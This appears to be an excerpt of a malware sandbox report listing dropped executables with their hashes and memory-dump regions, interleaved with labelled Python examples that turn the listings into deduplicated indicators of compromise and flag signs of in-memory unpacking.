C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5    8e33397689414f30209a555b0ae1fe5c
SHA1   b915a1cb575c181c01b11a0f6b8a5e00e946e9c3
SHA256 45b8610362cb8b8948f0a3a193daaeca16a13798921573cd708450f478079976
SHA512 f8bfab698890515c7df76d6147e423faacd0e6d58b9e5ba9b891b56c5b62e0d1798165d510fa22b9a453e80a7e9eb511418c00158126b89aacbd7c7a43873b84
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5    d13de4e48b4427a73a4340a6ace5db21
SHA1   d7e7b96a64b2bc349629fa304bbda0218c325df3
SHA256 3bcf1ba8bef2b2f644ea1d59816b62f020d60d5b069ffe342a93b64ed5e1c3b7
SHA512 3b2bc2c7b661325ab1a0a8a93bc1a6eefe1f0871ce403104f23ba97224bcaec4d9195d502b82b5944e79e3af3d2a6364a7bdf246fd2c235f287349342450dc3f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk
MD5    730caef19280e479d840b334beab7e02
SHA1   d9d966eb551ebc179d77223a1f78f9c78a37ae2d
SHA256 a47f93c26a80c9d770fda34291972b8d3e34790a8bf9e1f65b54de52f06cd972
SHA512 c828b8bbd3b93ac788a534534e21c5e8916d5f2ec7c4850a7de35fa4b2a9bedc05c44db5e74dfbfd25dba69874c53e423066d87c650bb3a519b2c906f7a1b0f7
-
C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe
MD5    de81af8581f20d9e9f9c3c9a7bde615e
SHA1   15dc49a2ebe56f612d34df7ec30fd5c3bed15c8c
SHA256 dbecea3dc584e1739a913d37e3e9e2b275e4690aef7b1d914e5fb97757e5f91f
SHA512 d0c3bc289f9910ed9b8cebf339c1468ccf06cf172c3290808f7333da1b22ec2927561b7b22a634dbb3fe7feb2e2037fba123ec56a29a2ef321ef4f28272b935b
-
C:\Users\Admin\Documents\7E4KGS5KRYdTYM9UbhbVCkXW.exe
MD5    9a734932fdb71584cf4815628dfdf0a2
SHA1   00e220a79898819fc32a452f48009bf7183ddcef
SHA256 a840cd858cccf8279b5760c864fd0f8918c71727ba1d852e07c2c0e9f0aad0b5
SHA512 97f5e8d81c7010f02f958d6f23c96468029ff6dc13112d061d045a51968da6685e3362301b5c8ede31f52c8ba3762c6d2d662c98784837c0014242837443486b
-
C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe
MD5    e7edde522e6bcd99c9b85c4e885453f5
SHA1   f021f324929dff72c982a1bf293b6294e9b8863e
SHA256 6ce97b1c324be843ddccfd3fb4bcedfa32e523f6d1c6b30c05f91d5d20a41f88
SHA512 07fa12d6480a94853911d09197a2ca4e3ec0928a24e77fdfefde9b78c4526578c1127689ff295fdd1904faeccdb5dd19ee67036ac0c7f5e010dd9a9506240fda
-
C:\Users\Admin\Documents\WRV_nd3147gQ3tPAc_hVHB_8.exe
MD5    3ce71e31ed284da512adb15635a63520
SHA1   3a45b364960e2705b7eadd3719f541b9672be3a5
SHA256 7e00ddb689af8bb7eb4ce0a4b869f8e1806f2e99b3f60b746b779fa003a23d76
SHA512 3ba2fe92833be5b2ff5a36cb5c10270ff22972871edbd90ea217788ab98010b34983f8ad35da28b459f2bb225706549b030217b3d9fbac2c27d625a82af64074
-
C:\Users\Admin\Documents\YStoivV3td8fghxqUu2SgpQ_.exe
MD5    775e93f6d7f4219a9b2a895af53e1765
SHA1   65528927a1e83b59848a6a03baaf6ccfa85137ae
SHA256 e5df2d6a56f0f2627289b5c8b2740097a0b823f7a4a263d17dde31a0216f0767
SHA512 57edf3145f251a2c4fb10894b8c00fb84d6f2daee6e2fb6228a16212ba5b784d214373843aada2c7e5fcc7957ff57a6a6b0b8dcb353b500831dcbec5bee0ef31
-
C:\Users\Admin\Documents\Zh8HfuR0H99IFab95QhRkd_A.exe
MD5    c313d316a73c4b707009aa33639d4a54
SHA1   592c5ac228e7e12a2c755a38b73da582dfa58410
SHA256 fde32083cbaa479937e045e0458319876b31914aeee3f5995f6fb5ed5755d168
SHA512 7e9cc4ae0dff2532dc3a50063d0bcc45cd2077484169e77a310b3eb8cfbf4c479592bf0693465e85d2c53d31046593b42d397818cb21d1e1a3a6cc184b80899a
-
C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe
MD5    eee61101abc7938e209703b0a3aef0c7
SHA1   739c40f28760e818f384920c083000bcd5438f2a
SHA256 d5b3807108e1d3d49d93ccc9c2cb6b6fc0c902f830660e589abcb4dc95862899
SHA512 b622714ab308caa8775570144c3469d3932b87d5d4896c0a354b85455906d14b114737a49706762b3c951eb566a1541c8c5837e14b6fb568b0fbdbe36ce81301
-
C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe
MD5    ab257d8f1d6ea3dd53151250ea80e435
SHA1   6b72721ae4c76e6d2f3323dc50a38a36f83a3546
SHA256 036f99c2d1ac8466bdad0ae578feb24b8ae2ea68e70a97106d85e4e3871ccf6c
SHA512 3027461d6eeec0d02a93cf6ef1a68ea187a5b0bfd96ab267c00eeabd828011a73915f40b606e9fae4d3cce4cac8bd428782d70408f2a5d2cb42b8287b4a62faf
-
C:\Users\Admin\Documents\g5B8YLScVV_0zfy7P6hxlaVs.exe
MD5    d432d82dfedd999b3d6b7cec3f6f5985
SHA1   fb0ea0f2d178d8aa91f989ee936b875a6e01ca92
SHA256 432a96e7a625d04b2d13d4874c6137dbd8c305e2133d0792b969520fe4a1f06b
SHA512 2b23ff0cd3d0f328aa742501ad55c4ec09dd85f7dbf7a6e1d06283e4d0279b7b6e4f96b4be6118ed0d1fadc007cc960bd77ce5199f80b2cd9535081b1407074a
-
C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe
MD5    5795c4402c389aa0f3ca289dc7335d8c
SHA1   a6761330c745033188cf3b6dd5aade376af54c25
SHA256 c09596ee4b4f9db4ac8aba0e734aff43141900372b5067aa0bf34b288374bf21
SHA512 dcea1a8677fe1d15c63682382fe222134ad93e7f8a616055c041e9eede57bf05303fd08d439156abd14e55fc35ffe83696c51b68edd29c80326c513be8869398
-
C:\Users\Admin\Documents\zsfCb6oFQmmDs_S2Bbddwzsl.exe
MD5    5f8078648ffd347c7fef2e816202b3f6
SHA1   b6c0027b7654308d2ccb1c0181597c40fad888e8
SHA256 bcb6719c4e0df336cdd9043956ecf9058ebb77eb74ab13c046446f5334330034
SHA512 99bb2f3ce988566cbcb6afde0967be020b1a61356953a528c11e49898d94cf687995d2ffc822be70bc2cbaaf2b7d920eecff68def773b1c11b7a8c654697042a
-
\??\pipe\LOCAL\crashpad_3696_MVOLRBDSGRHYYTOA
MD5    d41d8cd98f00b204e9800998ecf8427e
SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
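Copied out of the report, a dropped-file listing like the one above usually arrives with the labels fused to the values (the path glued to "MD5", "SHA1<hex>" on one line) and with the same file listed once per process that wrote it. The Python below is an added example, not part of the Triage report or its tooling: it parses both that fused form and a spaced "LABEL  hex" form, validates digest lengths so that a SHA256 line is never misread as SHA1 followed by "256...", collapses identical repeats while keeping the two fj4ghga23_fsa.txt records that have different content, and leaves the Crashpad named pipe out of the IOC set because its digests (MD5 d41d8cd9..., SHA256 e3b0c442...) are those of empty input. The sample text is a constructed subset of the entries above.

```python
"""Added example (not part of the Triage report): parse a dropped-file
listing into unique, validated IOC records."""
import re
from dataclasses import dataclass

# SHA-256 of zero-length input. A "dropped file" carrying it has no content
# (here a Crashpad named pipe) and is no indicator worth sharing.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HEX_RE = re.compile(r"^[0-9a-f]+$")


@dataclass(frozen=True)
class Dropped:
    path: str
    md5: str
    sha1: str
    sha256: str
    sha512: str

    @property
    def is_named_pipe(self) -> bool:
        return self.path.lower().startswith("\\??\\pipe\\")


def _digest_line(line):
    """(label, digest) for a digest line, None for a path line. Accepts the
    fused form ('SHA1<hex>') and the spaced form ('SHA1   <hex>'); a bare
    32-hex line is the MD5 value the fused export puts on its own line.
    Longer labels are tried first and the remainder must have exactly the
    digest length, so 'SHA256...' is never read as SHA1 + '256...'."""
    for label in sorted(HEX_LEN, key=len, reverse=True):
        if line.startswith(label):
            rest = line[len(label):].strip().lower()
            if len(rest) == HEX_LEN[label] and HEX_RE.match(rest):
                return label, rest
    bare = line.lower()
    if len(bare) == HEX_LEN["MD5"] and HEX_RE.match(bare):
        return "MD5", bare
    return None


def _build(path, digests):
    missing = set(HEX_LEN) - set(digests)
    if missing:
        raise ValueError(f"{path}: missing {sorted(missing)}")
    return Dropped(path, digests["MD5"], digests["SHA1"],
                   digests["SHA256"], digests["SHA512"])


def parse_dropped(text):
    entries, path, digests = [], None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        parsed = _digest_line(line)
        if parsed is None:                 # a path line starts a new entry
            if digests:
                entries.append(_build(path, digests))
            # the fused export glues the MD5 label onto the path
            path = line[:-3] if line.endswith("MD5") else line
            digests = {}
        else:
            digests[parsed[0]] = parsed[1]
    if digests:
        entries.append(_build(path, digests))
    return entries


def dedupe(entries):
    """Collapse identical records (same path and digests); the same path
    with different content stays as separate records."""
    seen, unique = set(), []
    for e in entries:
        if e not in seen:
            seen.add(e)
            unique.append(e)
    return unique


def ioc_sha256(entries):
    """Shareable SHA-256 indicators: real files with non-empty content."""
    return sorted({e.sha256 for e in dedupe(entries)
                   if not e.is_named_pipe and e.sha256 != EMPTY_SHA256})


# Constructed sample: a subset of the report's entries in the fused export form.
SAMPLE = r"""
-
C:\Users\Admin\AppData\Local\Temp\Complete.exeMD5
92acb4017f38a7ee6c5d2f6ef0d32af2
SHA11b932faf564f18ccc63e5dabff5c705ac30a61b8
SHA2562459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1
SHA512d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txtMD5
b7161c0845a64ff6d7345b67ff97f3b0
SHA1d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA51298d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txtMD5
eed40acf4703986a80f00ec41c6949fe
SHA13184a7c0fb0b705a9607d5a0b9b2beb80f6b60fc
SHA256d6a9f4d0e28e490da5dddaa597518fc0d8fefca03932c94457785aec4f3ddbf5
SHA512ec49b4eeff25d8c58d47aadcc6f560c353c5bd0dee6f49be71587432c9c1b560664abc9d23496e6a08e657a5a2d802f663373e4004299672b283b5de028610ba
-
\??\pipe\LOCAL\crashpad_3696_MVOLRBDSGRHYYTOAMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""
```

Feeding the listing twice (`parse_dropped(SAMPLE + SAMPLE)`) reproduces the report's per-writer repeats; `dedupe` brings them back to four records and `ioc_sha256` returns three hashes, because the pipe entry is dropped. A digest with the wrong length raises rather than silently producing a malformed indicator.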
memory/440-275-0x0000000000400000-0x00000000004CE000-memory.dmp  Filesize: 824KB
-
memory/440-242-0x00000000007A9000-0x0000000000815000-memory.dmp  Filesize: 432KB
-
memory/684-170-0x00007FFC14B60000-0x00007FFC14B61000-memory.dmp  Filesize: 4KB
-
memory/944-251-0x00000000054C0000-0x0000000005516000-memory.dmp  Filesize: 344KB
-
memory/944-246-0x0000000005220000-0x000000000522A000-memory.dmp  Filesize: 40KB
-
memory/944-244-0x00000000051E0000-0x0000000005784000-memory.dmp  Filesize: 5.6MB
-
memory/944-255-0x00000000051E0000-0x0000000005784000-memory.dmp  Filesize: 5.6MB
-
memory/944-212-0x00000000007D0000-0x000000000091C000-memory.dmp  Filesize: 1.3MB
-
memory/944-214-0x00000000725E0000-0x0000000072D90000-memory.dmp  Filesize: 7.7MB
-
memory/944-226-0x0000000005790000-0x0000000005D34000-memory.dmp  Filesize: 5.6MB
-
memory/944-233-0x0000000005280000-0x0000000005312000-memory.dmp  Filesize: 584KB
-
memory/944-219-0x0000000005140000-0x00000000051DC000-memory.dmp  Filesize: 624KB
-
memory/1756-163-0x0000000000400000-0x000000000060D000-memory.dmp  Filesize: 2.1MB
-
memory/1756-200-0x00000000046F0000-0x00000000046F8000-memory.dmp  Filesize: 32KB
-
memory/1920-237-0x00007FFBF39E0000-0x00007FFBF44A1000-memory.dmp  Filesize: 10.8MB
-
memory/1920-239-0x000000001B280000-0x000000001B282000-memory.dmp  Filesize: 8KB
-
memory/1920-230-0x0000000000290000-0x00000000002B8000-memory.dmp  Filesize: 160KB
-
memory/2008-211-0x00000000014B0000-0x00000000014F7000-memory.dmp  Filesize: 284KB
-
memory/2008-225-0x0000000000300000-0x000000000069D000-memory.dmp  Filesize: 3.6MB
-
memory/2008-213-0x0000000000300000-0x000000000069D000-memory.dmp  Filesize: 3.6MB
-
memory/2008-215-0x0000000000300000-0x000000000069D000-memory.dmp  Filesize: 3.6MB
-
memory/2008-220-0x0000000001500000-0x0000000001502000-memory.dmp  Filesize: 8KB
-
memory/2008-238-0x0000000002F40000-0x0000000002F42000-memory.dmp  Filesize: 8KB
-
memory/2008-204-0x0000000000400000-0x0000000000495000-memory.dmp  Filesize: 596KB
-
memory/2008-201-0x0000000000400000-0x0000000000495000-memory.dmp  Filesize: 596KB
-
memory/2008-240-0x0000000000300000-0x000000000069D000-memory.dmp  Filesize: 3.6MB
-
memory/2008-205-0x0000000000400000-0x0000000000495000-memory.dmp  Filesize: 596KB
-
memory/3028-195-0x0000000008850000-0x0000000008866000-memory.dmp  Filesize: 88KB
-
memory/3232-184-0x0000000005270000-0x0000000005B96000-memory.dmp  Filesize: 9.1MB
-
memory/3232-193-0x0000000000400000-0x000000000309C000-memory.dmp  Filesize: 44.6MB
-
memory/3232-181-0x0000000004E2C000-0x0000000005268000-memory.dmp  Filesize: 4.2MB
-
memory/4312-189-0x0000000004900000-0x000000000499D000-memory.dmp  Filesize: 628KB
-
memory/4312-188-0x0000000000400000-0x0000000002CBE000-memory.dmp  Filesize: 40.7MB
-
memory/4312-156-0x0000000002E28000-0x0000000002E8D000-memory.dmp  Filesize: 404KB
-
memory/4312-185-0x0000000002E28000-0x0000000002E8D000-memory.dmp  Filesize: 404KB
-
memory/4556-143-0x000000001AE70000-0x000000001AE72000-memory.dmp  Filesize: 8KB
-
memory/4556-142-0x00007FFBF69B0000-0x00007FFBF7471000-memory.dmp  Filesize: 10.8MB
-
memory/4556-136-0x0000000000170000-0x00000000001A6000-memory.dmp  Filesize: 216KB
-
memory/4596-279-0x0000000000400000-0x0000000000629000-memory.dmp  Filesize: 2.2MB
-
memory/4596-277-0x0000000000400000-0x0000000000629000-memory.dmp  Filesize: 2.2MB
-
memory/4596-286-0x0000000000400000-0x0000000000629000-memory.dmp  Filesize: 2.2MB
-
memory/4704-159-0x0000000072410000-0x0000000072BC0000-memory.dmp  Filesize: 7.7MB
-
memory/4704-153-0x0000000000970000-0x00000000009FA000-memory.dmp  Filesize: 552KB
-
memory/4704-160-0x00000000053A0000-0x00000000053A1000-memory.dmp  Filesize: 4KB
-
memory/4764-241-0x00000000022E0000-0x0000000002340000-memory.dmp  Filesize: 384KB
-
memory/4784-174-0x0000000002E59000-0x0000000002E61000-memory.dmp  Filesize: 32KB
-
memory/4784-149-0x0000000002E59000-0x0000000002E61000-memory.dmp  Filesize: 32KB
-
memory/4784-175-0x0000000002DB0000-0x0000000002DB9000-memory.dmp  Filesize: 36KB
-
memory/4784-180-0x0000000000400000-0x0000000002C67000-memory.dmp  Filesize: 40.4MB
-
memory/5072-284-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
-
memory/5072-278-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
-
memory/5072-281-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
-
memory/5072-276-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
-
memory/5144-273-0x00000000021AB000-0x000000000223D000-memory.dmp  Filesize: 584KB
-
memory/5144-280-0x0000000002240000-0x000000000235B000-memory.dmp  Filesize: 1.1MB
-
memory/5168-266-0x0000000004020000-0x00000000047DE000-memory.dmp  Filesize: 7.7MB
-
memory/5284-245-0x0000000002140000-0x00000000021A0000-memory.dmp  Filesize: 384KB
-
memory/5304-252-0x0000000002140000-0x00000000021A0000-memory.dmp  Filesize: 384KB
-
memory/5320-261-0x00000000044A0000-0x0000000004C5E000-memory.dmp  Filesize: 7.7MB
-
memory/5344-254-0x000000000073D000-0x0000000000765000-memory.dmp  Filesize: 160KB
-
memory/5344-256-0x000000000073D000-0x0000000000765000-memory.dmp  Filesize: 160KB
-
memory/5344-258-0x0000000000400000-0x000000000048C000-memory.dmp  Filesize: 560KB
-
memory/5344-257-0x0000000001FC0000-0x0000000002004000-memory.dmp  Filesize: 272KB
-
memory/5448-287-0x0000000000470000-0x0000000000570000-memory.dmp  Filesize: 1024KB
-
memory/5532-283-0x00000000007B0000-0x00000000007EE000-memory.dmp  Filesize: 248KB
-
memory/5532-285-0x00007FFBF39E0000-0x00007FFBF44A1000-memory.dmp  Filesize: 10.8MB
-
memory/5596-253-0x00000000057C0000-0x00000000057C1000-memory.dmp  Filesize: 4KB
-
memory/5596-249-0x00000000725E0000-0x0000000072D90000-memory.dmp  Filesize: 7.7MB
-
memory/5596-248-0x0000000000DB0000-0x0000000000DC8000-memory.dmp  Filesize: 96KB
-
memory/5648-271-0x00000000021D0000-0x00000000021D1000-memory.dmp  Filesize: 4KB
-
memory/5648-264-0x0000000002210000-0x0000000002246000-memory.dmp  Filesize: 216KB
-
memory/5648-270-0x0000000004D30000-0x0000000005358000-memory.dmp  Filesize: 6.2MB
-
memory/5648-262-0x00000000725E0000-0x0000000072D90000-memory.dmp  Filesize: 7.7MB
-
memory/5648-268-0x00000000021D2000-0x00000000021D3000-memory.dmp  Filesize: 4KB
-
memory/5784-263-0x00000000725E0000-0x0000000072D90000-memory.dmp  Filesize: 7.7MB
-
memory/5784-272-0x0000000004AF2000-0x0000000004AF3000-memory.dmp  Filesize: 4KB
-
memory/5784-269-0x0000000004AF0000-0x0000000004AF1000-memory.dmp  Filesize: 4KB
-
memory/6048-274-0x0000000004FD0000-0x0000000004FD1000-memory.dmp  Filesize: 4KB
-
memory/6048-265-0x00000000725E0000-0x0000000072D90000-memory.dmp  Filesize: 7.7MB
-
memory/6140-259-0x00000000725E0000-0x0000000072D90000-memory.dmp  Filesize: 7.7MB
-
memory/6140-267-0x00000000021B2000-0x00000000021B3000-memory.dmp  Filesize: 4KB
-
memory/6140-260-0x00000000021B0000-0x00000000021B1000-memory.dmp  Filesize: 4KB
-
memory/6208-349-0x0000000010000000-0x0000000010D56000-memory.dmp  Filesize: 13.3MB
-
memory/6592-321-0x00000000005E9000-0x00000000005F7000-memory.dmp  Filesize: 56KB
-
memory/6716-304-0x0000000000400000-0x0000000000420000-memory.dmp  Filesize: 128KB
-
memory/6780-339-0x000000000053D000-0x0000000000565000-memory.dmp  Filesize: 160KB
-
memory/6900-311-0x0000000000649000-0x00000000006B5000-memory.dmp  Filesize: 432KB
-
memory/6936-309-0x00000000011D0000-0x00000000011D2000-memory.dmp  Filesize: 8KB
-
memory/6936-307-0x0000000000100000-0x000000000049D000-memory.dmp  Filesize: 3.6MB
-
memory/6936-306-0x0000000000100000-0x000000000049D000-memory.dmp  Filesize: 3.6MB
-
memory/6944-373-0x0000000000400000-0x0000000000629000-memory.dmp  Filesize: 2.2MB
-
memory/7668-376-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
-
memory/7668-382-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
-
memory/7668-370-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
-
memory/8184-366-0x00000000006D9000-0x00000000006E6000-memory.dmp  Filesize: 52KB
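The dump names follow memory/<pid>-<sequence>-0x<start>-0x<end>-memory.dmp, so each region's size is recoverable from the name alone (0x4CE000 - 0x400000 = 843776 bytes = 824KB, in binary units), and the listing carries triage signals of its own: PID 3232 has a 44.6MB region at the default 32-bit image base 0x400000 although the sample on disk is 9.1MB, PID 2008 had the same two ranges dumped at several sequence numbers (the region was rewritten, which is what in-place unpacking looks like), and the single 7.7MB range at 0x725E0000 is mapped in six processes, which makes it a shared module rather than per-process payload. The Python below is an added example, not part of the Triage report or its tooling; the dump list is a constructed subset of the names above, and the on-disk size is taken from the 9.1MB in the report header because the exact byte count is not on the page.

```python
"""Added example (not from the Triage report): recover region sizes from
memory dump names and pull out the unpacking-related signals."""
import re
from collections import Counter, defaultdict

DUMP_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")

IMAGE_BASE_32 = 0x400000                    # default image base of 32-bit executables
SAMPLE_SIZE_BYTES = int(9.1 * (1 << 20))    # assumption: 9.1MB from the report header

# Constructed sample: a subset of the dump names listed in the report.
SAMPLE_DUMPS = [
    "memory/440-275-0x0000000000400000-0x00000000004CE000-memory.dmp",
    "memory/944-214-0x00000000725E0000-0x0000000072D90000-memory.dmp",
    "memory/2008-201-0x0000000000400000-0x0000000000495000-memory.dmp",
    "memory/2008-204-0x0000000000400000-0x0000000000495000-memory.dmp",
    "memory/2008-205-0x0000000000400000-0x0000000000495000-memory.dmp",
    "memory/2008-213-0x0000000000300000-0x000000000069D000-memory.dmp",
    "memory/2008-225-0x0000000000300000-0x000000000069D000-memory.dmp",
    "memory/3232-193-0x0000000000400000-0x000000000309C000-memory.dmp",
    "memory/5448-287-0x0000000000470000-0x0000000000570000-memory.dmp",
    "memory/5596-249-0x00000000725E0000-0x0000000072D90000-memory.dmp",
    "memory/6140-259-0x00000000725E0000-0x0000000072D90000-memory.dmp",
]


def parse_dump(line):
    """Split 'memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp' into its parts;
    trailing text (such as a size annotation) is ignored."""
    m = DUMP_RE.search(line)
    if not m:
        raise ValueError(f"not a memory dump name: {line!r}")
    pid, seq = int(m.group(1)), int(m.group(2))
    start, end = int(m.group(3), 16), int(m.group(4), 16)
    if end <= start:
        raise ValueError(f"empty or inverted range in {line!r}")
    return {"pid": pid, "seq": seq, "start": start, "end": end, "size": end - start}


def human_size(size):
    """Report-style size: whole KiB up to and including 1 MiB, one decimal
    in MiB above that (so 0x100000 bytes prints as 1024KB, as in the report)."""
    if size > 1 << 20:
        return f"{size / (1 << 20):.1f}MB"
    return f"{size // 1024}KB"


def rewritten_regions(lines, min_dumps=2):
    """Regions of one process captured at several sequence numbers: the
    sandbox saw the same range change, which is what in-place unpacking looks like."""
    counts = Counter()
    for line in lines:
        d = parse_dump(line)
        counts[(d["pid"], d["start"], d["end"])] += 1
    return {k: n for k, n in counts.items() if n >= min_dumps}


def unpacked_images(lines, on_disk_size):
    """PIDs whose region at the 32-bit image base is larger than the sample on
    disk: an image that grew after loading (unpacked or injected). Returns the
    largest such region size per PID."""
    hits = {}
    for line in lines:
        d = parse_dump(line)
        if d["start"] == IMAGE_BASE_32 and d["size"] > on_disk_size:
            hits[d["pid"]] = max(hits.get(d["pid"], 0), d["size"])
    return hits


def shared_mappings(lines, min_pids=2):
    """Identical ranges present in several processes: a shared module, not
    per-process payload, so not worth carving from every dump."""
    pids = defaultdict(set)
    for line in lines:
        d = parse_dump(line)
        pids[(d["start"], d["end"])].add(d["pid"])
    return {rng: sorted(p) for rng, p in pids.items() if len(p) >= min_pids}


if __name__ == "__main__":
    for name in SAMPLE_DUMPS:
        d = parse_dump(name)
        print(f"pid {d['pid']:>5} seq {d['seq']:>3} {human_size(d['size']):>8}  {name}")
    print("rewritten:", rewritten_regions(SAMPLE_DUMPS))
    print("unpacked :", unpacked_images(SAMPLE_DUMPS, SAMPLE_SIZE_BYTES))
    print("shared   :", shared_mappings(SAMPLE_DUMPS))
```

Run over the full listing, `unpacked_images` also picks up PIDs 4312 (40.7MB) and 4784 (40.4MB), which, like 3232, have an image-base region several times the size of the dropped sample; those are the dumps to feed to a PE reconstruction tool first.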